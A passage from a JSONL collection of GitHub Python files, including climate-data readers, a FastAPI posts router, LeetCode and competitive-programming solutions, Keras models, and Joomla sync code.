0.\n avgEcc = 0.\n avgEquivlentDiameter = 0.\n stdEquivlentDiameter = 0.\n weightedX = 0.\n weightedY = 0.\n numNodes = 0.\n numNodesperSlice = 0.\n # crude hueristic to filter some bad segmentaitons\n # do not allow any nodes to be larger than 10% of the pixels to eliminate background regions\n maxAllowedArea = 0.10 * 512 * 512 \n minAllowedArea = 9\n \n areas = []\n eqDiameters = []\n \n for i in range(slices_img_map.shape[0]):\n regions = extract_regions_from_map(slices_img_map[i,0,:,:])\n for region in regions:\n if region.area > maxAllowedArea: # or region.area < minAllowedArea:\n continue\n totalArea += region.area\n areas.append(region.area)\n avgEcc += region.eccentricity\n avgEquivlentDiameter += region.equivalent_diameter\n eqDiameters.append(region.equivalent_diameter)\n weightedX += region.centroid[0]*region.area\n weightedY += region.centroid[1]*region.area\n numNodes += 1\n \n weightedX = weightedX / totalArea \n weightedY = weightedY / totalArea\n avgArea = totalArea / numNodes\n avgEcc = avgEcc / numNodes\n avgEquivlentDiameter = avgEquivlentDiameter / numNodes\n stdEquivlentDiameter = np.std(eqDiameters)\n \n maxArea = np.max(areas)\n numNodesperSlice = numNodes*1. / nslices\n \n return np.array([avgArea,maxArea,avgEcc,avgEquivlentDiameter,\\\n stdEquivlentDiameter, weightedX, weightedY, numNodes, numNodesperSlice])\n\n\n","repo_name":"mingot/lung_cancer_ds_bowl","sub_path":"src/utils/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"90"} +{"seq_id":"36070147801","text":"\"\"\"\nFunctions Read in NetCDF4 data files for CESM Climate Model\n\"\"\"\n\nfrom netCDF4 import Dataset\n\ndef ocean(oceanfilename):\n \"\"\"\n Function reads CESM data for the oceans\n \n \n Parameters\n ----------\n oceanfilename : file (string)\n \n Returns\n ----------\n lon : array of longitudes\n lat : array of latitudes\n nino34 : time series array of nino3.4 anoms\n nino12 : time series array of nino1+2 anoms\n nino3 : time series array of nino3 anoms\n nino4 : time series array of nino4 anoms\n pdo : time series array of PDO indices\n \"\"\"\n directory = '/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Data/'\n filename = directory + oceanfilename\n values = Dataset(filename)\n lon = values.variables['lon'][:]\n lat = values.variables['lat'][:]\n nino34 = values.variables['nino34'][:]\n nino12 = values.variables['nino12'][:]\n nino3 = values.variables['nino3'][:]\n nino4 = values.variables['nino4'][:]\n pdo = values.variables['pdo_timeseries_mon'][:]\n values.close()\n\n return lon, lat, nino34, nino12, nino3, nino4, pdo \n\n#SLPfilename = 'b.e11.B1850C5CN.f09_g16.005.cam.h1.PSL.04020101-04991231.nc'\n \ndef SLP(SLPfilename):\n \"\"\"\n Function reads CESM data for SLP (CESM-LE control)\n \n Parameters\n ----------\n filename : file (string)\n \n Returns\n ----------\n lon : array of longitudes\n lat : array of latitudes\n date : list of available dates\n slp : sea level pressure in Pa\n \"\"\"\n directory = '/volumes/zml5/scripts/'\n filename = directory + SLPfilename\n values = Dataset(filename)\n date = values.variables['date'][:]\n lon = values.variables['lon'][185:244]\n lat = values.variables['lat'][123:155]\n SLP = values.variables['PSL'][:,123:155,185:244] \n values.close()\n \n return lon, lat, date, SLP","repo_name":"zmlabe/EarlySpringOnset","sub_path":"Scripts/control_SLP_datareader.py","file_name":"control_SLP_datareader.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"40999583564","text":"from fastapi import APIRouter, Depends, status, Response, HTTPException\nfrom typing import List\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql.functions import func\n\nfrom app.database import get_db\nfrom app.models import Post, Vote\nfrom app.oauth2 import get_current_user\nfrom app.schemas import PostResponseSchema, PostRequestSchema\n\nrouter = APIRouter(prefix='/posts', tags=['Posts'])\nsession = Depends(get_db)\n\n@router.get('/', response_model=List[PostResponseSchema])\ndef get_posts(limit: int = 10, offset: int = 0, db: Session = session, current_user = Depends(get_current_user)):\n posts = db.query(Post).filter(Post.user_id == current_user.id).limit(limit).offset(offset).all()\n\n return posts\n\n@router.get('/{id}/', response_model=PostResponseSchema)\ndef get_post(id: int, db: Session = session, current_user = Depends(get_current_user)):\n post = db.query(Post).filter(Post.id == id).first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Post with id: {id} was not found.')\n\n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail=f'Not authorized to perform requested action.')\n\n return post\n\n@router.post('/', response_model=PostResponseSchema, status_code=status.HTTP_201_CREATED)\ndef create_posts(post: PostRequestSchema, db: Session = session, current_user = Depends(get_current_user)):\n new_post = Post(user_id=current_user.id, **post.dict())\n\n db.add(new_post)\n db.commit()\n db.refresh(new_post)\n\n return new_post\n\n@router.put('/{id}/', response_model=PostResponseSchema)\ndef update_post(id: int, new_post: PostRequestSchema, db: Session = session,\n current_user: int = Depends(get_current_user)):\n post_query = db.query(Post).filter(Post.id == id)\n post = post_query.first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Post with id: {id} was not found.')\n\n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail=f'Not authorized to perform requested action.')\n\n post_query.update(new_post.dict(), synchronize_session=False)\n db.commit()\n db.refresh(post)\n\n return post\n\n@router.delete('/{id}/')\ndef delete_post(id: int, db: Session = session, current_user = Depends(get_current_user)):\n post_query = db.query(Post).filter(Post.id == id)\n post = post_query.first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Post with id: {id} does not exist.')\n\n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail=f'Not authorized to perform requested action.')\n\n post_query.delete(synchronize_session=False)\n db.commit()\n\n return Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"ekoroto/fast-api","sub_path":"app/routers/post_router.py","file_name":"post_router.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"34290182947","text":"## written by xiongbiao\n## date 2020-5-28\n\n'''\n给你一个整数数组 nums 。「数组值」定义为所有满足 0 <= i < nums.length-1 的 |nums[i]-nums[i+1]| 的和。\n你可以选择给定数组的任意子数组,并将该子数组翻转。但你只能执行这个操作 一次 。\n请你找到可行的最大 数组值 。\n'''\n\nclass Solution(object):\n def maxValueAfterReverse(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n ans = float('-inf')\n ori_ans = 0\n for i in range(1, n):\n ori_ans += abs(nums[i] - nums[i-1])\n\n for r in range(1, n-1):\n delta = abs(nums[0] - nums[r + 1]) - abs(nums[r] - nums[r + 1])\n ans = max(ans, ori_ans + delta)\n\n for l in range(1, n-1):\n delta = abs(nums[n - 1] - nums[l - 1]) - abs(nums[l] - nums[l - 1])\n ans = max(ans, delta + ori_ans)\n\n f1, f2, f3, f4 = float('-inf'), float('-inf'), float('-inf'), float('-inf')\n for l in range(1, n):\n abs_val = abs(nums[l] - nums[l - 1])\n f1 = max(f1, nums[l] + nums[l - 1] - abs_val)\n f2 = max(f2, -nums[l] + nums[l - 1] - abs_val)\n f3 = max(f3, nums[l] - nums[l - 1] - abs_val)\n f4 = max(f4, -nums[l] - nums[l - 1] - abs_val)\n\n g1, g2, g3, g4 = float('-inf'), float('-inf'), float('-inf'), float('-inf')\n for r in range(n - 1):\n abs_val = abs(nums[r] - nums[r + 1])\n g1 = max(g1, -nums[r] - nums[r + 1] - abs_val)\n g2 = max(g2, -nums[r] + nums[r + 1] - abs_val)\n g3 = max(g3, nums[r] - nums[r + 1] - abs_val)\n g4 = max(g4, nums[r] + nums[r + 1] - abs_val)\n\n delta = max(f1+g1, g2+f2, g3+f3, g4+f4)\n return max(ans, ori_ans + delta)\nprint(Solution().maxValueAfterReverse([2,3,1,5,4]))\n","repo_name":"xb2342996/Algorithm-and-Data-Structure","sub_path":"LeetCode_vII/Array/1330. 翻转子数组得到最大的数组值.py","file_name":"1330. 翻转子数组得到最大的数组值.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18285541139","text":"N=int(input())\narms=[list(map(int,input().split())) for _ in range(N)]\npoints=[]\nfor i in range(N):\n points.append([arms[i][0]-arms[i][1],arms[i][0]+arms[i][1]])\n#print(points)\npoints.sort(key=lambda x:x[1])\n#print(points)\nnowr=-float(\"inf\")\ncnt=0\nfor i in points:\n l,r=i\n if nowr<=l:\n nowr=r\n cnt=cnt+1\nprint(cnt)\n\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02796/s266925570.py","file_name":"s266925570.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"24889074188","text":"from typing import Generator\nfrom app.db.sesson import LocalSession\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends, Header, HTTPException, status\n\nimport jwt\nfrom pydantic import ValidationError\n\n\nfrom app import model, crud, schemas\nfrom app.core.config import settings\n\n\ndef get_db() -> Generator:\n try:\n db = LocalSession()\n yield db\n finally:\n db.close()\n\n\ndef get_current_user(\n db: Session = Depends(get_db), authorization: str = Header(None)\n) -> model.User:\n try:\n if authorization.split()[0] not in (\"jwt\", \"JWT\"):\n raise HTTPException(400, \"credentials required\")\n token = authorization.split()[1]\n payload = jwt.decode(token, settings.SECRET_KEY, algorithms=settings.ALGORITHM)\n token_data = schemas.AccessTokenPayload(**payload)\n\n except (jwt.JWTError, ValidationError):\n raise HTTPException(\n status_code=status.HTTP_403_FORBIDDEN,\n detail=\"Could not validate credentials\",\n )\n user = crud.user.get(db, id=token_data.sub)\n if not user:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return user\n","repo_name":"Sing-it/Singit_API","sub_path":"app/api/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"18431271889","text":"import sys\nread = sys.stdin.read\nreadline = sys.stdin.buffer.readline\nsys.setrecursionlimit(10 ** 8)\nINF = float('inf')\nMOD = 10 ** 9 + 7\n\ndef main():\n n = int(input())\n S = input()\n L = [0] * 26\n\n for s in S:\n L[ord(s) - 97] += 1\n\n ans = 1\n for i in range(26):\n if L[i] != 0:\n ans = (ans * (L[i] + 1)) % (10 ** 9 + 7)\n\n print(ans - 1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03095/s836822017.py","file_name":"s836822017.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17347850020","text":"import pickle\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n# 1. Load the dataset from a CSV file\ndf = pd.read_csv('lang_scores.csv')\n\n# 2. Data cleaning\nprint(df.isnull())\nprint(df.isnull().sum())\ndf.dropna(inplace=True)\ndf.drop_duplicates(inplace=True)\nprint(df.isnull().sum())\n\n# 3. Select the features and target variable\nX = df[['Reading', 'Listening', 'Speaking', 'Writing']]\ny = df['LangLevel']\n\n# 4. Encode categorical variables as numeric\nX = pd.get_dummies(X)\n\n# 5. Split the dataset into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n\n# 6. Train a decision tree model\nclf = DecisionTreeClassifier()\nclf.fit(X_train, y_train)\n\n# pickle.dump(clf, open(\"model.pkl\", \"wb\"))\n\n\n# 7. Make predictions on the testing set\ny_pred = clf.predict(X_test)\n\n# 8. Evaluate the model's accuracy\naccuracy = accuracy_score(y_test, y_pred)\nprint(\"Accuracy:\", accuracy)","repo_name":"UBSITAntonioBenjamin/LanguageLevel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"1747681985","text":"import tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Layer, Input, Masking, LSTM, Embedding, Dense\n\nclass EndTokenEmbedLayer(Layer):\n def __init__(self):\n super(EndTokenEmbedLayer, self).__init__()\n\n def build(self, input_shape):\n self.embedding_size = input_shape[-1]\n self.embedding = self.add_weight(shape=(self.embedding_size,),\n initializer='random_normal',\n name='end_token_embedding')\n \n def call(self, inputs):\n one_row = tf.reshape(self.embedding,(-1,1,self.embedding_size))\n end_token_output = tf.tile(one_row,[tf.shape(inputs)[0],1,1])\n return tf.concat((inputs,end_token_output),axis=1)\n\ndef Encoder(input_shape):\n inputs = Input(input_shape)\n h = EndTokenEmbedLayer()(inputs)\n h = Masking(mask_value=0.)(h)\n lstm , hidden_state, cell_state = LSTM(512,return_sequences=True,return_state=True)(h)\n model = Model(inputs=inputs, outputs=[hidden_state, cell_state])\n return model\n\nclass Decoder(Model):\n def __init__(self,input_embedding_dim):\n super(Decoder, self).__init__()\n self.embedding = Embedding(input_dim = input_embedding_dim[0],\n output_dim = input_embedding_dim[1],\n mask_zero = True)\n self.lstm = LSTM(units=512, return_sequences=True, return_state=True)\n self.dense = Dense(units=input_embedding_dim[0])\n\n def call(self,inputs,hidden_state = None,cell_state = None):\n h = self.embedding(inputs)\n if hidden_state != None and cell_state != None:\n lstm,hidden,cell = self.lstm(h,initial_state =[hidden_state,cell_state])\n else:\n lstm,hidden,cell = self.lstm(h)\n h = self.dense(lstm)\n return h,hidden,cell\n\nclass NeuralTranslationModel(Model):\n def __init__(self,encoder_input_shape,decoder_input_shape):\n super(NeuralTranslationModel, self).__init__()\n self.encoder = Encoder(input_shape=encoder_input_shape)\n self.decoder = Decoder(input_embedding_dim=decoder_input_shape)\n self.model_trainable_variables = self.encoder.trainable_variables + \\\n self.decoder.trainable_variables \n \n def chinese_data_io(self,chinese_data):\n input_data = chinese_data[:,0:tf.shape(chinese_data)[1]-1]\n output_data = chinese_data[:,1:tf.shape(chinese_data)[1]]\n return(input_data,output_data)\n\n def call(self,inputs):\n (encoder_in, decoder_in)=inputs\n hidden_state ,cell_state = self.encoder(encoder_in)\n dense_output, _, _ = self.decoder(decoder_in, hidden_state, cell_state)\n return dense_output\n\n @tf.function\n def train_step(self,data): \n (english,chinese) = data\n chinese_input, chinese_output = self.chinese_data_io(chinese) \n with tf.GradientTape() as tape: \n hidden_state ,cell_state = self.encoder(english)\n dense_output, _, _ = self.decoder(chinese_input, hidden_state, cell_state)\n loss = tf.math.reduce_mean(self.compiled_loss(chinese_output,dense_output))\n grads = tape.gradient(loss, self.model_trainable_variables)\n self.optimizer.apply_gradients(zip(grads,\n self.model_trainable_variables))\n self.compiled_metrics.update_state(chinese_output,dense_output)\n return {m.name:m.result() for m in self.metrics}\n\n @tf.function\n def test_step(self, data):\n (english,chinese) = data\n chinese_input, chinese_output = self.chinese_data_io(chinese) \n hidden_state ,cell_state = self.encoder(english)\n dense_output, _, _ = self.decoder(chinese_input, hidden_state, cell_state)\n loss = tf.math.reduce_mean(self.compiled_loss(chinese_output,dense_output))\n self.compiled_metrics.update_state(chinese_output,dense_output)\n return {m.name:m.result() for m in self.metrics}","repo_name":"raymondngiam/neural-translation-model-eng-to-ch","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18496283809","text":"Row = int(input())\nflag = True\nList = []\nfor i in range (Row):\n List.append(input())\ns_l = set(List)\nif len(List) != len(s_l):\n print(\"No\")\nelse:\n for i in range(Row-1):\n n = len(List[i])-1\n if List[i][n] != List[i+1][0]:\n flag = False\n if flag:\n print(\"Yes\")\n else:\n print(\"No\")","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03261/s362093478.py","file_name":"s362093478.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"6101398645","text":"# coding=utf-8\n\nimport os\n\nfrom prodtools.utils import fs_utils\nfrom prodtools import TABLES_PATH\n\n\nSYMBOLS_CSV = TABLES_PATH + '/symbols.csv'\nSYMBOLS_HTML = TABLES_PATH + '/symbols.html'\nsymbols = None\n\n\n#§<font face="Symbol">&#167;</font>club&clubs;  is  &#9827;  is  Black club suitWGL4\n#caracter|source html|name|...|...|def|?\n# 0 | 4 | 5 \ndef html2table():\n _items = []\n c = fs_utils.read_file(SYMBOLS_HTML)\n c = c.replace('', '~BREAK~')\n items = [item for item in c.split('~BREAK~') if item.startswith('') and 'Symbol' in item]\n for item in items:\n item = item.replace('')\n cells = item.split('')\n if len(cells) == 7:\n _char = cells[0]\n _ent = cells[4]\n _def = cells[5]\n _char = _char[0:_char.rfind('')]\n _char = _char[_char.rfind('>')+1:]\n _ent = _ent[_ent.rfind('&'):]\n _ent = _ent[0:_ent.rfind(';')+1]\n _items.append(_char + '\\t' + _ent + '\\t' + _def)\n fs_utils.write_file(SYMBOLS_CSV, '\\n'.join(_items))\n\n\ndef load_symbols():\n symbols_items = {}\n for row in fs_utils.read_file_lines(SYMBOLS_CSV):\n cells = row.split('\\t')\n if len(cells) == 3:\n char, ent, descr = cells\n symbols_items[char] = ent\n return symbols_items\n\n\ndef get_symbol(c):\n global symbols\n if symbols is None:\n symbols = load_symbols()\n return symbols.get(c, '?')\n\n\nif not os.path.isfile(SYMBOLS_CSV):\n html2table()\nif os.path.isfile(SYMBOLS_CSV):\n if symbols is None:\n symbols = load_symbols()\n","repo_name":"scieloorg/PC-Programs","sub_path":"src/scielo/bin/xml/prodtools/processing/symbols.py","file_name":"symbols.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"90"} +{"seq_id":"17452738662","text":"import os\nfrom PIL import Image\nfrom torchvision import transforms\nimport cv2\nimport numpy as np\nfrom flowmatch.datasets.utils import random_homography_and_crop, random_crop_bbox, bbox\nfrom flowmatch.datasets.utils_syn import blend, PIL2array1C\nfrom flowmatch.flowutils.compute_flow import affine_flow\nfrom flowmatch.datasets.setting import *\n\nclass BigBirdDataset:\n def __init__(self, root, cfg):\n \"\"\"`MS Coco Captions `_ Dataset.\n Args:\n root (string): Root directory where images are downloaded to.\n cfg (easydict.EasyDict): Config.\n \"\"\"\n self.root = root\n self.cfg = cfg\n\n self._init_transform()\n\n print('Mapping all objects/masks paths ... ', end='', flush=True)\n self.data_pths = self._all_image_path()\n print('done.')\n print('Total {} items in dataset.'.format(len(self.data_pths)))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: Dict (image, bbox).\n bbox is the (single) bounding box annotation in xyxy format.\n bbox is a continuous float where 0 <= x1,x2 <= width and 0 <= y1,y2 <= height.\n\n * 'fs' is acronym for 'full_scene'.\n * 'cs' is acronym for 'crop_scene'.\n \"\"\"\n\n target_pth, mask_pth = self.data_pths[index]\n fs_im = cv2.imread(target_pth) # acronym for full scene\n tg_mask = 255 - PIL2array1C(Image.open(mask_pth))\n x1,x2,y1,y2 = bbox(tg_mask > 0)\n h,w = x2-x1+1, y2-y1+1\n scale = min(OBJECT_SIZE / max(h,w), 1)\n tg_im = cv2.resize(fs_im[x1:x2+1, y1:y2+1], (int(w*scale), int(h*scale)))\n tg_mask = cv2.resize(tg_mask[x1:x2+1, y1:y2+1], (int(w*scale), int(h*scale)))\n\n # Get crop_scene and homography matrix.\n cs_im, cs_mask, M = random_homography_and_crop(tg_im, tg_mask)\n x1,x2, y1,y2 = bbox(cs_mask > 0)\n dx, dy = y1, x1\n\n # Get homography flow\n h,w = cs_im.shape[:2]\n flow = affine_flow([w,h], [0,0,w-1,h-1], M)\n\n # Paste object into background\n cs_info = blend(Image.fromarray(cs_im), Image.fromarray(cs_mask))\n bbx, cs_im, cs_mask = cs_info['bbx'], cs_info['cs_im'], cs_info['cs_mask']\n\n # Crop object randomly from the blended image\n x1, x2, y1, y2 = bbx\n cs_mask = np.array(cs_mask)\n hp, wp = cs_im.height, cs_im.width\n cs_im, cs_mask, cs_bbox = random_crop_bbox(cs_im, cs_mask, [x1, y1, x2, y2], [1.2, 1.6])\n \n # Translate flow accordingly\n xp1, yp1, xp2, yp2 = np.multiply(cs_bbox, np.array([wp, hp, wp, hp]))\n hp, wp = cs_im.height, cs_im.width\n tg_mask = np.float32(tg_mask > 0)\n flow[:,:,0] = (flow[:,:,0]*w + x1 - xp1 - dx) / wp\n flow[:,:,1] = (flow[:,:,1]*h + y1 - yp1 - dy) / hp\n\n example = {'cs_im': cs_im,\n 'cs_mask': cs_mask,\n 'homography': M,\n 'tg_im': tg_im,\n 'tg_mask': tg_mask,\n 'flow': flow,\n 'img_id': target_pth,\n }\n return example\n\n def __len__(self):\n return len(self.data_pths)\n\n def _init_transform(self):\n # Initialize torch-defined transforms that will be used by self.transform().\n self.transform_ops = {'ToTensor': transforms.ToTensor(),\n 'Normalize': transforms.Normalize(mean=self.cfg.mean, std=self.cfg.std)}\n\n def _all_image_path(self):\n objects = list(filter(lambda x: os.path.isdir(os.path.join(self.root, x)), \n os.listdir(self.root)))\n res = []\n for obj in objects:\n obj_root = os.path.join(self.root, obj)\n img_pths = list(filter(lambda x: x.endswith('.jpg'), os.listdir(obj_root)))\n data = list(map(lambda x: (os.path.join(obj_root, x), \n os.path.join(obj_root, 'masks', x[:-4]+'_mask.pbm')),\n img_pths))\n data = list(filter(lambda x: os.path.exists(x[0]) and os.path.exists(x[1]), data))\n # print('Object {} with {} images'.format(obj, len(data)))\n res += data\n return res\n\n def add_gt_flow(self, example):\n # Get GT optical flow.\n # flow = self._compute_gt_flow(example['resized_tg_im'], example['resized_tg_mask'], example['homography'])\n\n if 'flow' not in example.keys():\n print('flow unavailable for {}'.format(example['img_id']))\n # If flow is not successfully computed, return None to indicate that this example has failed\n return None\n\n # Transform flow.\n\n # Step 1: Centre flow values by shifting range from [0, 1] to [-0.5, 0.5].\n centered_flow = example['resized_flow'] - 0.5\n\n # Step 2: Convert array to tensor.\n example['net_flow'] = self.transform_ops['ToTensor'](centered_flow)\n return example\n","repo_name":"siddancha/FlowVerify","sub_path":"flowmatch/datasets/bigBird.py","file_name":"bigBird.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"12603069389","text":"# message size and latency and packetloss rate\nimport numpy as np\nimport glob\nimport pandas as pd\nfrom functools import reduce\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras import optimizers\nimport matplotlib.pyplot as plt\n# load the dataset\n\npath = r'./msgsize-latency/'\nall_paths = glob.glob(path+'*.csv')\nall_csvs = list(map(lambda x: np.loadtxt(x,delimiter=\",\", skiprows=1, usecols=(2,5,6,7,14,19)), all_paths))\ndataset = reduce((lambda x,y: np.concatenate((x,y), axis=0)), all_csvs)\nnumRecords = dataset.shape[0] # Total number of exp records\nnumTrains = numRecords-5\nparaDim = 1\n\ntrainset = dataset[0:numTrains, :]\ntestset = dataset[numTrains:numRecords, :]\ntrainX = trainset[:,1]\ntrainY = trainset[:,5]\ntestX = testset[:, 1]\ntestY = testset[:, 5]\nmodelTitle = 'mz_ly'\nprint(trainX, trainY)\n# define the keras model\nmodel = Sequential()\nmodel.add(Dense(64, activation=\"relu\", input_dim=paraDim))\nmodel.add(Dense(128, activation=\"linear\"))\nmodel.add(Dense(1, activation=\"linear\"))\n\n# compile the keras model\n\nmodel.compile(loss='mse',\n optimizer=optimizers.RMSprop(lr=0.01),\n metrics=['mae', 'mse', 'accuracy', 'mape'])\n# fit the keras model on the dataset\nhistory = model.fit(trainX, trainY, validation_split=0.25, epochs=5000, batch_size=10)\nmodel.save('./savedModels/'+modelTitle+'/mszLtcy.h5')\n# evaluate the keras model\n\nyPredictions = model.predict(testX)\n\nfig1 = plt.figure()\nplt.scatter(testX, testY)\nplt.scatter(trainX, trainY)\nplt.plot(testX,yPredictions)\nfig1.savefig('./figures/'+modelTitle+'/PredictionResult.png')\n\nfig2 = plt.figure()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.xlabel('Epoch')\nplt.ylabel('MSE')\nfig2.savefig('./figures/'+modelTitle+'/lossHistory.png')\n\n","repo_name":"woohan/kafkaPrediction","sub_path":"mz_ly_model1.py","file_name":"mz_ly_model1.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"70663396458","text":"import re\nfrom typing import List, Sequence\n\nfrom autoclick.types import *\nfrom autoclick.utils import get_match_type\n\n\nVALIDATIONS: Dict[Type, List[Callable]] = {}\n\nUNDERSCORES = re.compile(\"_\")\nALPHA_CHARS = set(chr(i) for i in tuple(range(97, 123)) + tuple(range(65, 91)))\n\n\nclass ValidationError(click.UsageError):\n \"\"\"Raised by a validation function when an input violates a constraint.\n \"\"\"\n\n\ndef register_validation(type_: Type, validation_fn: Callable):\n \"\"\"\n\n Args:\n type_:\n validation_fn:\n \"\"\"\n if type_ not in VALIDATIONS:\n VALIDATIONS[type_] = []\n VALIDATIONS[type_].append(validation_fn)\n\n\ndef has_validations(type_: Type) -> bool:\n \"\"\"\n\n Args:\n type_:\n\n Returns:\n\n \"\"\"\n return type_ in VALIDATIONS\n\n\ndef get_validations(type_: Type) -> Optional[Sequence[Callable]]:\n \"\"\"\n\n Args:\n type_:\n\n Returns:\n\n \"\"\"\n return VALIDATIONS.get(type_, None)\n\n\ndef validation(\n match_type: Optional[Type] = None,\n depends: Optional[Tuple[Callable, ...]] = None,\n decorated: Optional[Callable] = None\n):\n \"\"\"Annotates a single-parameter validation.\n\n Args:\n match_type: The type that will match this validation. If None, is inferred\n from the type of the first parameter in the signature of the annotated\n function.\n depends: Other validations that are pre-requisite for this one.\n decorated: The function to decorate.\n\n Returns:\n A decorator function.\n \"\"\"\n def decorator(f: Callable) -> Callable:\n _match_type = match_type\n if _match_type is None:\n _match_type = get_match_type(f)\n\n if depends:\n def composite_validation(**kwargs):\n for dep in depends:\n dep(**kwargs)\n f(**kwargs)\n target = composite_validation\n else:\n target = f\n\n # Annotated validation functions can only ever validate a single parameter\n # so we can explicitly specify the param name and value as kwargs to the\n # decorated function.\n def call_target(**kwargs):\n if len(kwargs) == 2 and set(kwargs.keys()) == {\"param_name\", \"value\"}:\n pass\n elif len(kwargs) != 1:\n print(kwargs)\n raise ValueError(\n \"A @validation decorator may only validate a single parameter.\"\n )\n else:\n kwargs = dict(zip((\"param_name\", \"value\"), list(kwargs.items())[0]))\n if kwargs[\"value\"] is not None:\n target(**kwargs)\n\n register_validation(match_type, call_target)\n\n return call_target\n\n if decorated:\n return decorator(decorated)\n else:\n return decorator\n","repo_name":"jdidion/autoclick","sub_path":"autoclick/validations/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"90"} +{"seq_id":"12028870055","text":"import os\nimport logging\nfrom dotenv import load_dotenv\nfrom files_parser import get_questions\nfrom log_handler import MyLogsHandler\nimport telegram_dialog \nimport vk_dialog\n\n\ndef main():\n\n logging.basicConfig(format ='%(asctime)s - %(name)s - %(levelname)s - %(message)s ')\n logger = logging.getLogger('bot_logger')\n logger.setLevel(logging.INFO)\n logger.addHandler(MyLogsHandler(my_chat_id = os.environ['QUIZ_TELEGRAMM_CHAT_ID']))\n logger.info('Бот проверки ошибок викторины запущен')\n\n load_dotenv()\n questions = get_questions('questions')\n try:\n telebot = telegram_dialog.MyTelegram_bot(questions)\n telebot.run_telegram_bot()\n\n vkbot = vk_dialog.MyVkBot(questions)\n vkbot.run_vk_bot()\n except ConnectionError:\n logger.exception() \n\n\nif __name__ == \"__main__\":\n\n main()\n\n","repo_name":"BespalovSergey/quiz_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"3143749029","text":"\"\"\"\nSync fields between Joomla Community Builder and Member registry.\n\"\"\"\n\n# imports\nimport sys\nimport os\nimport sqlalchemy\nimport datetime\nfrom sqlalchemy import or_\n\nsys.path.append(os.path.dirname(os.getcwd())) # Add .. to path\nfrom backend.ldaplogin import (get_member_with_real_name,\n DuplicateNamesException, PersonNotFoundException)\nfrom backend import connect\nfrom backend.orm import (Member, ContactInformation, Jos_CBFields,\n Jos_Users, Jos_Fields, Jos_Privacy)\n\n# constants\nNOT_VISIBLE = 99\n\n# Jos_CBFields conversions\nCOMPROFDICT = dict(\n cb_streetaddress='streetAddress_fld',\n cb_postalcode='postalCode_fld',\n cb_city='city_fld',\n cb_country='country_fld',\n cb_phone='phone_fld',\n cb_subscribedtomodulen='subscribedtomodulen_fld')\n\n\n# exception classes\n# interface functions\n# classes\n# internal functions & classes\n\ndef get_members(joomlasession, registrysession, username):\n registrymember = registrysession.query(Member).filter(Member.username_fld ==\n username).one()\n joomlamember = joomlasession.query(\n 